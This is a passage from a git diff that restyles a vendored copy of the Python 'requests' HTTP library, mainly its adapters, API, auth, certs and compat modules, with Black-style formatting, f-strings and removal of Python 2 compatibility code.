 requests.adapters
 ~~~~~~~~~~~~~~~~~
@@ -9,57 +7,76 @@
 """
 
 import os.path
-import socket
+import socket  # noqa: F401
 
+from urllib3.exceptions import ClosedPoolError, ConnectTimeoutError
+from urllib3.exceptions import HTTPError as _HTTPError
+from urllib3.exceptions import InvalidHeader as _InvalidHeader
+from urllib3.exceptions import (
+    LocationValueError,
+    MaxRetryError,
+    NewConnectionError,
+    ProtocolError,
+)
+from urllib3.exceptions import ProxyError as _ProxyError
+from urllib3.exceptions import ReadTimeoutError, ResponseError
+from urllib3.exceptions import SSLError as _SSLError
 from urllib3.poolmanager import PoolManager, proxy_from_url
 from urllib3.response import HTTPResponse
-from urllib3.util import parse_url
 from urllib3.util import Timeout as TimeoutSauce
+from urllib3.util import parse_url
 from urllib3.util.retry import Retry
-from urllib3.exceptions import ClosedPoolError
-from urllib3.exceptions import ConnectTimeoutError
-from urllib3.exceptions import HTTPError as _HTTPError
-from urllib3.exceptions import MaxRetryError
-from urllib3.exceptions import NewConnectionError
-from urllib3.exceptions import ProxyError as _ProxyError
-from urllib3.exceptions import ProtocolError
-from urllib3.exceptions import ReadTimeoutError
-from urllib3.exceptions import SSLError as _SSLError
-from urllib3.exceptions import ResponseError
-from urllib3.exceptions import LocationValueError
 
+from .auth import _basic_auth_str
+from .compat import basestring, urlparse
+from .cookies import extract_cookies_to_jar
+from .exceptions import (
+    ConnectionError,
+    ConnectTimeout,
+    InvalidHeader,
+    InvalidProxyURL,
+    InvalidSchema,
+    InvalidURL,
+    ProxyError,
+    ReadTimeout,
+    RetryError,
+    SSLError,
+)
 from .models import Response
-from .compat import urlparse, basestring
-from .utils import (DEFAULT_CA_BUNDLE_PATH, extract_zipped_paths,
-                    get_encoding_from_headers, prepend_scheme_if_needed,
-                    get_auth_from_url, urldefragauth, select_proxy)
 from .structures import CaseInsensitiveDict
-from .cookies import extract_cookies_to_jar
-from .exceptions import (ConnectionError, ConnectTimeout, ReadTimeout, SSLError,
-                         ProxyError, RetryError, InvalidSchema, InvalidProxyURL,
-                         InvalidURL)
-from .auth import _basic_auth_str
+from .utils import (
+    DEFAULT_CA_BUNDLE_PATH,
+    extract_zipped_paths,
+    get_auth_from_url,
+    get_encoding_from_headers,
+    prepend_scheme_if_needed,
+    select_proxy,
+    urldefragauth,
+)
 
 try:
     from urllib3.contrib.socks import SOCKSProxyManager
 except ImportError:
+
     def SOCKSProxyManager(*args, **kwargs):
         raise InvalidSchema("Missing dependencies for SOCKS support.")
 
+
 DEFAULT_POOLBLOCK = False
 DEFAULT_POOLSIZE = 10
 DEFAULT_RETRIES = 0
 DEFAULT_POOL_TIMEOUT = None
 
 
-class BaseAdapter(object):
+class BaseAdapter:
     """The Base Transport Adapter"""
 
     def __init__(self):
-        super(BaseAdapter, self).__init__()
+        super().__init__()
 
-    def send(self, request, stream=False, timeout=None, verify=True,
-             cert=None, proxies=None):
+    def send(
+        self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None
+    ):
         """Sends PreparedRequest object. Returns Response object.
 
         :param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
@@ -107,12 +124,22 @@ class HTTPAdapter(BaseAdapter):
       >>> a = requests.adapters.HTTPAdapter(max_retries=3)
       >>> s.mount('http://', a)
     """
-    __attrs__ = ['max_retries', 'config', '_pool_connections', '_pool_maxsize',
-                 '_pool_block']
 
-    def __init__(self, pool_connections=DEFAULT_POOLSIZE,
-                 pool_maxsize=DEFAULT_POOLSIZE, max_retries=DEFAULT_RETRIES,
-                 pool_block=DEFAULT_POOLBLOCK):
+    __attrs__ = [
+        "max_retries",
+        "config",
+        "_pool_connections",
+        "_pool_maxsize",
+        "_pool_block",
+    ]
+
+    def __init__(
+        self,
+        pool_connections=DEFAULT_POOLSIZE,
+        pool_maxsize=DEFAULT_POOLSIZE,
+        max_retries=DEFAULT_RETRIES,
+        pool_block=DEFAULT_POOLBLOCK,
+    ):
         if max_retries == DEFAULT_RETRIES:
             self.max_retries = Retry(0, read=False)
         else:
@@ -120,7 +147,7 @@ def __init__(self, pool_connections=DEFAULT_POOLSIZE,
         self.config = {}
         self.proxy_manager = {}
 
-        super(HTTPAdapter, self).__init__()
+        super().__init__()
 
         self._pool_connections = pool_connections
         self._pool_maxsize = pool_maxsize
@@ -140,10 +167,13 @@ def __setstate__(self, state):
         for attr, value in state.items():
             setattr(self, attr, value)
 
-        self.init_poolmanager(self._pool_connections, self._pool_maxsize,
-                              block=self._pool_block)
+        self.init_poolmanager(
+            self._pool_connections, self._pool_maxsize, block=self._pool_block
+        )
 
-    def init_poolmanager(self, connections, maxsize, block=DEFAULT_POOLBLOCK, **pool_kwargs):
+    def init_poolmanager(
+        self, connections, maxsize, block=DEFAULT_POOLBLOCK, **pool_kwargs
+    ):
         """Initializes a urllib3 PoolManager.
 
         This method should not be called from user code, and is only
@@ -160,8 +190,13 @@ def init_poolmanager(self, connections, maxsize, block=DEFAULT_POOLBLOCK, **pool
         self._pool_maxsize = maxsize
         self._pool_block = block
 
-        self.poolmanager = PoolManager(num_pools=connections, maxsize=maxsize,
-                                       block=block, strict=True, **pool_kwargs)
+        self.poolmanager = PoolManager(
+            num_pools=connections,
+            maxsize=maxsize,
+            block=block,
+            strict=True,
+            **pool_kwargs,
+        )
 
     def proxy_manager_for(self, proxy, **proxy_kwargs):
         """Return urllib3 ProxyManager for the given proxy.
@@ -177,7 +212,7 @@ def proxy_manager_for(self, proxy, **proxy_kwargs):
         """
         if proxy in self.proxy_manager:
             manager = self.proxy_manager[proxy]
-        elif proxy.lower().startswith('socks'):
+        elif proxy.lower().startswith("socks"):
             username, password = get_auth_from_url(proxy)
             manager = self.proxy_manager[proxy] = SOCKSProxyManager(
                 proxy,
@@ -186,7 +221,7 @@ def proxy_manager_for(self, proxy, **proxy_kwargs):
                 num_pools=self._pool_connections,
                 maxsize=self._pool_maxsize,
                 block=self._pool_block,
-                **proxy_kwargs
+                **proxy_kwargs,
             )
         else:
             proxy_headers = self.proxy_headers(proxy)
@@ -196,7 +231,8 @@ def proxy_manager_for(self, proxy, **proxy_kwargs):
                 num_pools=self._pool_connections,
                 maxsize=self._pool_maxsize,
                 block=self._pool_block,
-                **proxy_kwargs)
+                **proxy_kwargs,
+            )
 
         return manager
 
@@ -212,7 +248,7 @@ def cert_verify(self, conn, url, verify, cert):
             to a CA bundle to use
         :param cert: The SSL certificate to verify.
         """
-        if url.lower().startswith('https') and verify:
+        if url.lower().startswith("https") and verify:
 
             cert_loc = None
 
@@ -224,17 +260,19 @@ def cert_verify(self, conn, url, verify, cert):
                 cert_loc = extract_zipped_paths(DEFAULT_CA_BUNDLE_PATH)
 
             if not cert_loc or not os.path.exists(cert_loc):
-                raise IOError("Could not find a suitable TLS CA certificate bundle, "
-                              "invalid path: {}".format(cert_loc))
+                raise OSError(
+                    f"Could not find a suitable TLS CA certificate bundle, "
+                    f"invalid path: {cert_loc}"
+                )
 
-            conn.cert_reqs = 'CERT_REQUIRED'
+            conn.cert_reqs = "CERT_REQUIRED"
 
             if not os.path.isdir(cert_loc):
                 conn.ca_certs = cert_loc
             else:
                 conn.ca_cert_dir = cert_loc
         else:
-            conn.cert_reqs = 'CERT_NONE'
+            conn.cert_reqs = "CERT_NONE"
             conn.ca_certs = None
             conn.ca_cert_dir = None
 
@@ -246,11 +284,14 @@ def cert_verify(self, conn, url, verify, cert):
                 conn.cert_file = cert
                 conn.key_file = None
             if conn.cert_file and not os.path.exists(conn.cert_file):
-                raise IOError("Could not find the TLS certificate file, "
-                              "invalid path: {}".format(conn.cert_file))
+                raise OSError(
+                    f"Could not find the TLS certificate file, "
+                    f"invalid path: {conn.cert_file}"
+                )
             if conn.key_file and not os.path.exists(conn.key_file):
-                raise IOError("Could not find the TLS key file, "
-                              "invalid path: {}".format(conn.key_file))
+                raise OSError(
+                    f"Could not find the TLS key file, invalid path: {conn.key_file}"
+                )
 
     def build_response(self, req, resp):
         """Builds a :class:`Response <requests.Response>` object from a urllib3
@@ -265,10 +306,10 @@ def build_response(self, req, resp):
         response = Response()
 
         # Fallback to None if there's no status_code, for whatever reason.
-        response.status_code = getattr(resp, 'status', None)
+        response.status_code = getattr(resp, "status", None)
 
         # Make headers case-insensitive.
-        response.headers = CaseInsensitiveDict(getattr(resp, 'headers', {}))
+        response.headers = CaseInsensitiveDict(getattr(resp, "headers", {}))
 
         # Set encoding.
         response.encoding = get_encoding_from_headers(response.headers)
@@ -276,7 +317,7 @@ def build_response(self, req, resp):
         response.reason = response.raw.reason
 
         if isinstance(req.url, bytes):
-            response.url = req.url.decode('utf-8')
+            response.url = req.url.decode("utf-8")
         else:
             response.url = req.url
 
@@ -301,11 +342,13 @@ def get_connection(self, url, proxies=None):
         proxy = select_proxy(url, proxies)
 
         if proxy:
-            proxy = prepend_scheme_if_needed(proxy, 'http')
+            proxy = prepend_scheme_if_needed(proxy, "http")
             proxy_url = parse_url(proxy)
             if not proxy_url.host:
-                raise InvalidProxyURL("Please check proxy URL. It is malformed"
-                                      " and could be missing the host.")
+                raise InvalidProxyURL(
+                    "Please check proxy URL. It is malformed "
+                    "and could be missing the host."
+                )
             proxy_manager = self.proxy_manager_for(proxy)
             conn = proxy_manager.connection_from_url(url)
         else:
@@ -343,11 +386,11 @@ def request_url(self, request, proxies):
         proxy = select_proxy(request.url, proxies)
         scheme = urlparse(request.url).scheme
 
-        is_proxied_http_request = (proxy and scheme != 'https')
+        is_proxied_http_request = proxy and scheme != "https"
         using_socks_proxy = False
         if proxy:
             proxy_scheme = urlparse(proxy).scheme.lower()
-            using_socks_proxy = proxy_scheme.startswith('socks')
+            using_socks_proxy = proxy_scheme.startswith("socks")
 
         url = request.path_url
         if is_proxied_http_request and not using_socks_proxy:
@@ -386,12 +429,13 @@ def proxy_headers(self, proxy):
         username, password = get_auth_from_url(proxy)
 
         if username:
-            headers['Proxy-Authorization'] = _basic_auth_str(username,
-                                                             password)
+            headers["Proxy-Authorization"] = _basic_auth_str(username, password)
 
         return headers
 
-    def send(self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None):
+    def send(
+        self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None
+    ):
         """Sends PreparedRequest object. Returns Response object.
 
         :param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
@@ -415,20 +459,26 @@ def send(self, request, stream=False, timeout=None, verify=True, cert=None, prox
 
         self.cert_verify(conn, request.url, verify, cert)
         url = self.request_url(request, proxies)
-        self.add_headers(request, stream=stream, timeout=timeout, verify=verify, cert=cert, proxies=proxies)
+        self.add_headers(
+            request,
+            stream=stream,
+            timeout=timeout,
+            verify=verify,
+            cert=cert,
+            proxies=proxies,
+        )
 
-        chunked = not (request.body is None or 'Content-Length' in request.headers)
+        chunked = not (request.body is None or "Content-Length" in request.headers)
 
         if isinstance(timeout, tuple):
             try:
                 connect, read = timeout
                 timeout = TimeoutSauce(connect=connect, read=read)
-            except ValueError as e:
-                # this may raise a string formatting error.
-                err = ("Invalid timeout {}. Pass a (connect, read) "
-                       "timeout tuple, or a single float to set "
-                       "both timeouts to the same value".format(timeout))
-                raise ValueError(err)
+            except ValueError:
+                raise ValueError(
+                    f"Invalid timeout {timeout}. Pass a (connect, read) timeout tuple, "
+                    f"or a single float to set both timeouts to the same value."
+                )
         elif isinstance(timeout, TimeoutSauce):
             pass
         else:
@@ -446,20 +496,24 @@ def send(self, request, stream=False, timeout=None, verify=True, cert=None, prox
                     preload_content=False,
                     decode_content=False,
                     retries=self.max_retries,
-                    timeout=timeout
+                    timeout=timeout,
                 )
 
             # Send the request.
             else:
-                if hasattr(conn, 'proxy_pool'):
+                if hasattr(conn, "proxy_pool"):
                     conn = conn.proxy_pool
 
                 low_conn = conn._get_conn(timeout=DEFAULT_POOL_TIMEOUT)
 
                 try:
-                    low_conn.putrequest(request.method,
-                                        url,
-                                        skip_accept_encoding=True)
+                    skip_host = "Host" in request.headers
+                    low_conn.putrequest(
+                        request.method,
+                        url,
+                        skip_accept_encoding=True,
+                        skip_host=skip_host,
+                    )
 
                     for header, value in request.headers.items():
                         low_conn.putheader(header, value)
@@ -467,34 +521,29 @@ def send(self, request, stream=False, timeout=None, verify=True, cert=None, prox
                     low_conn.endheaders()
 
                     for i in request.body:
-                        low_conn.send(hex(len(i))[2:].encode('utf-8'))
-                        low_conn.send(b'\r\n')
+                        low_conn.send(hex(len(i))[2:].encode("utf-8"))
+                        low_conn.send(b"\r\n")
                         low_conn.send(i)
-                        low_conn.send(b'\r\n')
-                    low_conn.send(b'0\r\n\r\n')
+                        low_conn.send(b"\r\n")
+                    low_conn.send(b"0\r\n\r\n")
 
                     # Receive the response from the server
-                    try:
-                        # For Python 2.7, use buffering of HTTP responses
-                        r = low_conn.getresponse(buffering=True)
-                    except TypeError:
-                        # For compatibility with Python 3.3+
-                        r = low_conn.getresponse()
+                    r = low_conn.getresponse()
 
                     resp = HTTPResponse.from_httplib(
                         r,
                         pool=conn,
                         connection=low_conn,
                         preload_content=False,
-                        decode_content=False
+                        decode_content=False,
                     )
-                except:
+                except Exception:
                     # If we hit any problems here, clean up the connection.
-                    # Then, reraise so that we can handle the actual exception.
+                    # Then, raise so that we can handle the actual exception.
                     low_conn.close()
                     raise
 
-        except (ProtocolError, socket.error) as err:
+        except (ProtocolError, OSError) as err:
             raise ConnectionError(err, request=request)
 
         except MaxRetryError as e:
@@ -527,6 +576,8 @@ def send(self, request, stream=False, timeout=None, verify=True, cert=None, prox
                 raise SSLError(e, request=request)
             elif isinstance(e, ReadTimeoutError):
                 raise ReadTimeout(e, request=request)
+            elif isinstance(e, _InvalidHeader):
+                raise InvalidHeader(e, request=request)
             else:
                 raise
 
diff --git a/thirdparty/requests/api.py b/thirdparty/requests/api.py
index 4cba90e..2f71aae 100644
--- a/thirdparty/requests/api.py
+++ b/thirdparty/requests/api.py
@@ -1,5 +1,3 @@
-# -*- coding: utf-8 -*-
-
 """
 requests.api
 ~~~~~~~~~~~~
@@ -72,7 +70,7 @@ def get(url, params=None, **kwargs):
     :rtype: requests.Response
     """
 
-    return request('get', url, params=params, **kwargs)
+    return request("get", url, params=params, **kwargs)
 
 
 def options(url, **kwargs):
@@ -84,7 +82,7 @@ def options(url, **kwargs):
     :rtype: requests.Response
     """
 
-    return request('options', url, **kwargs)
+    return request("options", url, **kwargs)
 
 
 def head(url, **kwargs):
@@ -98,8 +96,8 @@ def head(url, **kwargs):
     :rtype: requests.Response
     """
 
-    kwargs.setdefault('allow_redirects', False)
-    return request('head', url, **kwargs)
+    kwargs.setdefault("allow_redirects", False)
+    return request("head", url, **kwargs)
 
 
 def post(url, data=None, json=None, **kwargs):
@@ -114,7 +112,7 @@ def post(url, data=None, json=None, **kwargs):
     :rtype: requests.Response
     """
 
-    return request('post', url, data=data, json=json, **kwargs)
+    return request("post", url, data=data, json=json, **kwargs)
 
 
 def put(url, data=None, **kwargs):
@@ -129,7 +127,7 @@ def put(url, data=None, **kwargs):
     :rtype: requests.Response
     """
 
-    return request('put', url, data=data, **kwargs)
+    return request("put", url, data=data, **kwargs)
 
 
 def patch(url, data=None, **kwargs):
@@ -144,7 +142,7 @@ def patch(url, data=None, **kwargs):
     :rtype: requests.Response
     """
 
-    return request('patch', url, data=data, **kwargs)
+    return request("patch", url, data=data, **kwargs)
 
 
 def delete(url, **kwargs):
@@ -156,4 +154,4 @@ def delete(url, **kwargs):
     :rtype: requests.Response
     """
 
-    return request('delete', url, **kwargs)
+    return request("delete", url, **kwargs)
diff --git a/thirdparty/requests/auth.py b/thirdparty/requests/auth.py
index eeface3..9733686 100644
--- a/thirdparty/requests/auth.py
+++ b/thirdparty/requests/auth.py
@@ -1,5 +1,3 @@
-# -*- coding: utf-8 -*-
-
 """
 requests.auth
 ~~~~~~~~~~~~~
@@ -7,22 +5,21 @@
 This module contains the authentication handlers for Requests.
 """
 
+import hashlib
 import os
 import re
-import time
-import hashlib
 import threading
+import time
 import warnings
-
 from base64 import b64encode
 
-from .compat import urlparse, str, basestring
-from .cookies import extract_cookies_to_jar
 from ._internal_utils import to_native_string
+from .compat import basestring, str, urlparse
+from .cookies import extract_cookies_to_jar
 from .utils import parse_dict_header
 
-CONTENT_TYPE_FORM_URLENCODED = 'application/x-www-form-urlencoded'
-CONTENT_TYPE_MULTI_PART = 'multipart/form-data'
+CONTENT_TYPE_FORM_URLENCODED = "application/x-www-form-urlencoded"
+CONTENT_TYPE_MULTI_PART = "multipart/form-data"
 
 
 def _basic_auth_str(username, password):
@@ -57,23 +54,23 @@ def _basic_auth_str(username, password):
     # -- End Removal --
 
     if isinstance(username, str):
-        username = username.encode('latin1')
+        username = username.encode("latin1")
 
     if isinstance(password, str):
-        password = password.encode('latin1')
+        password = password.encode("latin1")
 
-    authstr = 'Basic ' + to_native_string(
-        b64encode(b':'.join((username, password))).strip()
+    authstr = "Basic " + to_native_string(
+        b64encode(b":".join((username, password))).strip()
     )
 
     return authstr
 
 
-class AuthBase(object):
+class AuthBase:
     """Base class that all auth implementations derive from"""
 
     def __call__(self, r):
-        raise NotImplementedError('Auth hooks must be callable.')
+        raise NotImplementedError("Auth hooks must be callable.")
 
 
 class HTTPBasicAuth(AuthBase):
@@ -84,16 +81,18 @@ def __init__(self, username, password):
         self.password = password
 
     def __eq__(self, other):
-        return all([
-            self.username == getattr(other, 'username', None),
-            self.password == getattr(other, 'password', None)
-        ])
+        return all(
+            [
+                self.username == getattr(other, "username", None),
+                self.password == getattr(other, "password", None),
+            ]
+        )
 
     def __ne__(self, other):
         return not self == other
 
     def __call__(self, r):
-        r.headers['Authorization'] = _basic_auth_str(self.username, self.password)
+        r.headers["Authorization"] = _basic_auth_str(self.username, self.password)
         return r
 
 
@@ -101,7 +100,7 @@ class HTTPProxyAuth(HTTPBasicAuth):
     """Attaches HTTP Proxy Authentication to a given Request object."""
 
     def __call__(self, r):
-        r.headers['Proxy-Authorization'] = _basic_auth_str(self.username, self.password)
+        r.headers["Proxy-Authorization"] = _basic_auth_str(self.username, self.password)
         return r
 
 
@@ -116,9 +115,9 @@ def __init__(self, username, password):
 
     def init_per_thread_state(self):
         # Ensure state is initialized just once per-thread
-        if not hasattr(self._thread_local, 'init'):
+        if not hasattr(self._thread_local, "init"):
             self._thread_local.init = True
-            self._thread_local.last_nonce = ''
+            self._thread_local.last_nonce = ""
             self._thread_local.nonce_count = 0
             self._thread_local.chal = {}
             self._thread_local.pos = None
@@ -129,44 +128,52 @@ def build_digest_header(self, method, url):
         :rtype: str
         """
 
-        realm = self._thread_local.chal['realm']
-        nonce = self._thread_local.chal['nonce']
-        qop = self._thread_local.chal.get('qop')
-        algorithm = self._thread_local.chal.get('algorithm')
-        opaque = self._thread_local.chal.get('opaque')
+        realm = self._thread_local.chal["realm"]
+        nonce = self._thread_local.chal["nonce"]
+        qop = self._thread_local.chal.get("qop")
+        algorithm = self._thread_local.chal.get("algorithm")
+        opaque = self._thread_local.chal.get("opaque")
         hash_utf8 = None
 
         if algorithm is None:
-            _algorithm = 'MD5'
+            _algorithm = "MD5"
         else:
             _algorithm = algorithm.upper()
         # lambdas assume digest modules are imported at the top level
-        if _algorithm == 'MD5' or _algorithm == 'MD5-SESS':
+        if _algorithm == "MD5" or _algorithm == "MD5-SESS":
+
             def md5_utf8(x):
                 if isinstance(x, str):
-                    x = x.encode('utf-8')
+                    x = x.encode("utf-8")
                 return hashlib.md5(x).hexdigest()
+
             hash_utf8 = md5_utf8
-        elif _algorithm == 'SHA':
+        elif _algorithm == "SHA":
+
             def sha_utf8(x):
                 if isinstance(x, str):
-                    x = x.encode('utf-8')
+                    x = x.encode("utf-8")
                 return hashlib.sha1(x).hexdigest()
+
             hash_utf8 = sha_utf8
-        elif _algorithm == 'SHA-256':
+        elif _algorithm == "SHA-256":
+
             def sha256_utf8(x):
                 if isinstance(x, str):
-                    x = x.encode('utf-8')
+                    x = x.encode("utf-8")
                 return hashlib.sha256(x).hexdigest()
+
             hash_utf8 = sha256_utf8
-        elif _algorithm == 'SHA-512':
+        elif _algorithm == "SHA-512":
+
             def sha512_utf8(x):
                 if isinstance(x, str):
-                    x = x.encode('utf-8')
+                    x = x.encode("utf-8")
                 return hashlib.sha512(x).hexdigest()
+
             hash_utf8 = sha512_utf8
 
-        KD = lambda s, d: hash_utf8("%s:%s" % (s, d))
+        KD = lambda s, d: hash_utf8(f"{s}:{d}")  # noqa:E731
 
         if hash_utf8 is None:
             return None
@@ -177,10 +184,10 @@ def sha512_utf8(x):
         #: path is request-uri defined in RFC 2616 which should not be empty
         path = p_parsed.path or "/"
         if p_parsed.query:
-            path += '?' + p_parsed.query
+            path += f"?{p_parsed.query}"
 
-        A1 = '%s:%s:%s' % (self.username, realm, self.password)
-        A2 = '%s:%s' % (method, path)
+        A1 = f"{self.username}:{realm}:{self.password}"
+        A2 = f"{method}:{path}"
 
         HA1 = hash_utf8(A1)
         HA2 = hash_utf8(A2)
@@ -189,22 +196,20 @@ def sha512_utf8(x):
             self._thread_local.nonce_count += 1
         else:
             self._thread_local.nonce_count = 1
-        ncvalue = '%08x' % self._thread_local.nonce_count
-        s = str(self._thread_local.nonce_count).encode('utf-8')
-        s += nonce.encode('utf-8')
-        s += time.ctime().encode('utf-8')
+        ncvalue = f"{self._thread_local.nonce_count:08x}"
+        s = str(self._thread_local.nonce_count).encode("utf-8")
+        s += nonce.encode("utf-8")
+        s += time.ctime().encode("utf-8")
         s += os.urandom(8)
 
-        cnonce = (hashlib.sha1(s).hexdigest()[:16])
-        if _algorithm == 'MD5-SESS':
-            HA1 = hash_utf8('%s:%s:%s' % (HA1, nonce, cnonce))
+        cnonce = hashlib.sha1(s).hexdigest()[:16]
+        if _algorithm == "MD5-SESS":
+            HA1 = hash_utf8(f"{HA1}:{nonce}:{cnonce}")
 
         if not qop:
-            respdig = KD(HA1, "%s:%s" % (nonce, HA2))
-        elif qop == 'auth' or 'auth' in qop.split(','):
-            noncebit = "%s:%s:%s:%s:%s" % (
-                nonce, ncvalue, cnonce, 'auth', HA2
-            )
+            respdig = KD(HA1, f"{nonce}:{HA2}")
+        elif qop == "auth" or "auth" in qop.split(","):
+            noncebit = f"{nonce}:{ncvalue}:{cnonce}:auth:{HA2}"
             respdig = KD(HA1, noncebit)
         else:
             # XXX handle auth-int.
@@ -213,18 +218,20 @@ def sha512_utf8(x):
         self._thread_local.last_nonce = nonce
 
         # XXX should the partial digests be encoded too?
-        base = 'username="%s", realm="%s", nonce="%s", uri="%s", ' \
-               'response="%s"' % (self.username, realm, nonce, path, respdig)
+        base = (
+            f'username="{self.username}", realm="{realm}", nonce="{nonce}", '
+            f'uri="{path}", response="{respdig}"'
+        )
         if opaque:
-            base += ', opaque="%s"' % opaque
+            base += f', opaque="{opaque}"'
         if algorithm:
-            base += ', algorithm="%s"' % algorithm
+            base += f', algorithm="{algorithm}"'
         if entdig:
-            base += ', digest="%s"' % entdig
+            base += f', digest="{entdig}"'
         if qop:
-            base += ', qop="auth", nc=%s, cnonce="%s"' % (ncvalue, cnonce)
+            base += f', qop="auth", nc={ncvalue}, cnonce="{cnonce}"'
 
-        return 'Digest %s' % (base)
+        return f"Digest {base}"
 
     def handle_redirect(self, r, **kwargs):
         """Reset num_401_calls counter on redirects."""
@@ -248,13 +255,13 @@ def handle_401(self, r, **kwargs):
             # Rewind the file position indicator of the body to where
             # it was to resend the request.
             r.request.body.seek(self._thread_local.pos)
-        s_auth = r.headers.get('www-authenticate', '')
+        s_auth = r.headers.get("www-authenticate", "")
 
-        if 'digest' in s_auth.lower() and self._thread_local.num_401_calls < 2:
+        if "digest" in s_auth.lower() and self._thread_local.num_401_calls < 2:
 
             self._thread_local.num_401_calls += 1
-            pat = re.compile(r'digest ', flags=re.IGNORECASE)
-            self._thread_local.chal = parse_dict_header(pat.sub('', s_auth, count=1))
+            pat = re.compile(r"digest ", flags=re.IGNORECASE)
+            self._thread_local.chal = parse_dict_header(pat.sub("", s_auth, count=1))
 
             # Consume content and release the original connection
             # to allow our new request to reuse the same one.
@@ -264,8 +271,9 @@ def handle_401(self, r, **kwargs):
             extract_cookies_to_jar(prep._cookies, r.request, r.raw)
             prep.prepare_cookies(prep._cookies)
 
-            prep.headers['Authorization'] = self.build_digest_header(
-                prep.method, prep.url)
+            prep.headers["Authorization"] = self.build_digest_header(
+                prep.method, prep.url
+            )
             _r = r.connection.send(prep, **kwargs)
             _r.history.append(r)
             _r.request = prep
@@ -280,7 +288,7 @@ def __call__(self, r):
         self.init_per_thread_state()
         # If we have a saved nonce, skip the 401
         if self._thread_local.last_nonce:
-            r.headers['Authorization'] = self.build_digest_header(r.method, r.url)
+            r.headers["Authorization"] = self.build_digest_header(r.method, r.url)
         try:
             self._thread_local.pos = r.body.tell()
         except AttributeError:
@@ -289,17 +297,19 @@ def __call__(self, r):
             # file position of the previous body. Ensure it's set to
             # None.
             self._thread_local.pos = None
-        r.register_hook('response', self.handle_401)
-        r.register_hook('response', self.handle_redirect)
+        r.register_hook("response", self.handle_401)
+        r.register_hook("response", self.handle_redirect)
         self._thread_local.num_401_calls = 1
 
         return r
 
     def __eq__(self, other):
-        return all([
-            self.username == getattr(other, 'username', None),
-            self.password == getattr(other, 'password', None)
-        ])
+        return all(
+            [
+                self.username == getattr(other, "username", None),
+                self.password == getattr(other, "password", None),
+            ]
+        )
 
     def __ne__(self, other):
         return not self == other
diff --git a/thirdparty/requests/certs.py b/thirdparty/requests/certs.py
index d1a378d..be422c3 100644
--- a/thirdparty/requests/certs.py
+++ b/thirdparty/requests/certs.py
@@ -1,5 +1,4 @@
 #!/usr/bin/env python
-# -*- coding: utf-8 -*-
 
 """
 requests.certs
@@ -14,5 +13,5 @@
 """
 from certifi import where
 
-if __name__ == '__main__':
+if __name__ == "__main__":
     print(where())
diff --git a/thirdparty/requests/compat.py b/thirdparty/requests/compat.py
index 0b14f50..6776163 100644
--- a/thirdparty/requests/compat.py
+++ b/thirdparty/requests/compat.py
@@ -1,11 +1,10 @@
-# -*- coding: utf-8 -*-
-
 """
 requests.compat
 ~~~~~~~~~~~~~~~
 
-This module handles import compatibility issues between Python 2 and
-Python 3.
+This module previously handled import compatibility issues
+between Python 2 and Python 3. It remains for backwards
+compatibility until the next major version.
 """
 
 try:
@@ -23,53 +22,58 @@
 _ver = sys.version_info
 
 #: Python 2.x?
-is_py2 = (_ver[0] == 2)
+is_py2 = _ver[0] == 2
 
 #: Python 3.x?
-is_py3 = (_ver[0] == 3)
+is_py3 = _ver[0] == 3
 
+# json/simplejson module import resolution
+has_simplejson = False
 try:
     import simplejson as json
+
+    has_simplejson = True
 except ImportError:
     import json
 
-# ---------
-# Specifics
-# ---------
-
-if is_py2:
-    from urllib import (
-        quote, unquote, quote_plus, unquote_plus, urlencode, getproxies,
-        proxy_bypass, proxy_bypass_environment, getproxies_environment)
-    from urlparse import urlparse, urlunparse, urljoin, urlsplit, urldefrag
-    from urllib2 import parse_http_list
-    import cookielib
-    from Cookie import Morsel
-    from StringIO import StringIO
-    # Keep OrderedDict for backwards compatibility.
-    from collections import Callable, Mapping, MutableMapping, OrderedDict
-
+if has_simplejson:
+    from simplejson import JSONDecodeError
+else:
+    from json import JSONDecodeError
 
-    builtin_str = str
-    bytes = str
-    str = unicode
-    basestring = basestring
-    numeric_types = (int, long, float)
-    integer_types = (int, long)
+# Keep OrderedDict for backwards compatibility.
+from collections import OrderedDict
+from collections.abc import Callable, Mapping, MutableMapping
+from http import cookiejar as cookielib
+from http.cookies import Morsel
+from io import StringIO
 
-elif is_py3:
-    from urllib.parse import urlparse, urlunparse, urljoin, urlsplit, urlencode, quote, unquote, quote_plus, unquote_plus, urldefrag
-    from urllib.request import parse_http_list, getproxies, proxy_bypass, proxy_bypass_environment, getproxies_environment
-    from http import cookiejar as cookielib
-    from http.cookies import Morsel
-    from io import StringIO
-    # Keep OrderedDict for backwards compatibility.
-    from collections import OrderedDict
-    from collections.abc import Callable, Mapping, MutableMapping
+# --------------
+# Legacy Imports
+# --------------
+from urllib.parse import (
+    quote,
+    quote_plus,
+    unquote,
+    unquote_plus,
+    urldefrag,
+    urlencode,
+    urljoin,
+    urlparse,
+    urlsplit,
+    urlunparse,
+)
+from urllib.request import (
+    getproxies,
+    getproxies_environment,
+    parse_http_list,
+    proxy_bypass,
+    proxy_bypass_environment,
+)
 
-    builtin_str = str
-    str = str
-    bytes = bytes
-    basestring = (str, bytes)
-    numeric_types = (int, float)
-    integer_types = (int,)
+builtin_str = str
+str = str
+bytes = bytes
+basestring = (str, bytes)
+numeric_types = (int, float)
+integer_types = (int,)
diff --git a/thirdparty/requests/cookies.py b/thirdparty/requests/cookies.py
index 56fccd9..bf54ab2 100644
--- a/thirdparty/requests/cookies.py
+++ b/thirdparty/requests/cookies.py
@@ -1,5 +1,3 @@
-# -*- coding: utf-8 -*-
-
 """
 requests.cookies
 ~~~~~~~~~~~~~~~~
@@ -9,12 +7,12 @@
 requests.utils imports from here, so be careful with imports.
 """
 
+import calendar
 import copy
 import time
-import calendar
 
 from ._internal_utils import to_native_string
-from .compat import cookielib, urlparse, urlunparse, Morsel, MutableMapping
+from .compat import Morsel, MutableMapping, cookielib, urlparse, urlunparse
 
 try:
     import threading
@@ -22,7 +20,7 @@
     import dummy_threading as threading
 
 
-class MockRequest(object):
+class MockRequest:
     """Wraps a `requests.Request` to mimic a `urllib2.Request`.
 
     The code in `cookielib.CookieJar` expects this interface in order to correctly
@@ -51,16 +49,22 @@ def get_origin_req_host(self):
     def get_full_url(self):
         # Only return the response's URL if the user hadn't set the Host
         # header
-        if not self._r.headers.get('Host'):
+        if not self._r.headers.get("Host"):
             return self._r.url
         # If they did set it, retrieve it and reconstruct the expected domain
-        host = to_native_string(self._r.headers['Host'], encoding='utf-8')
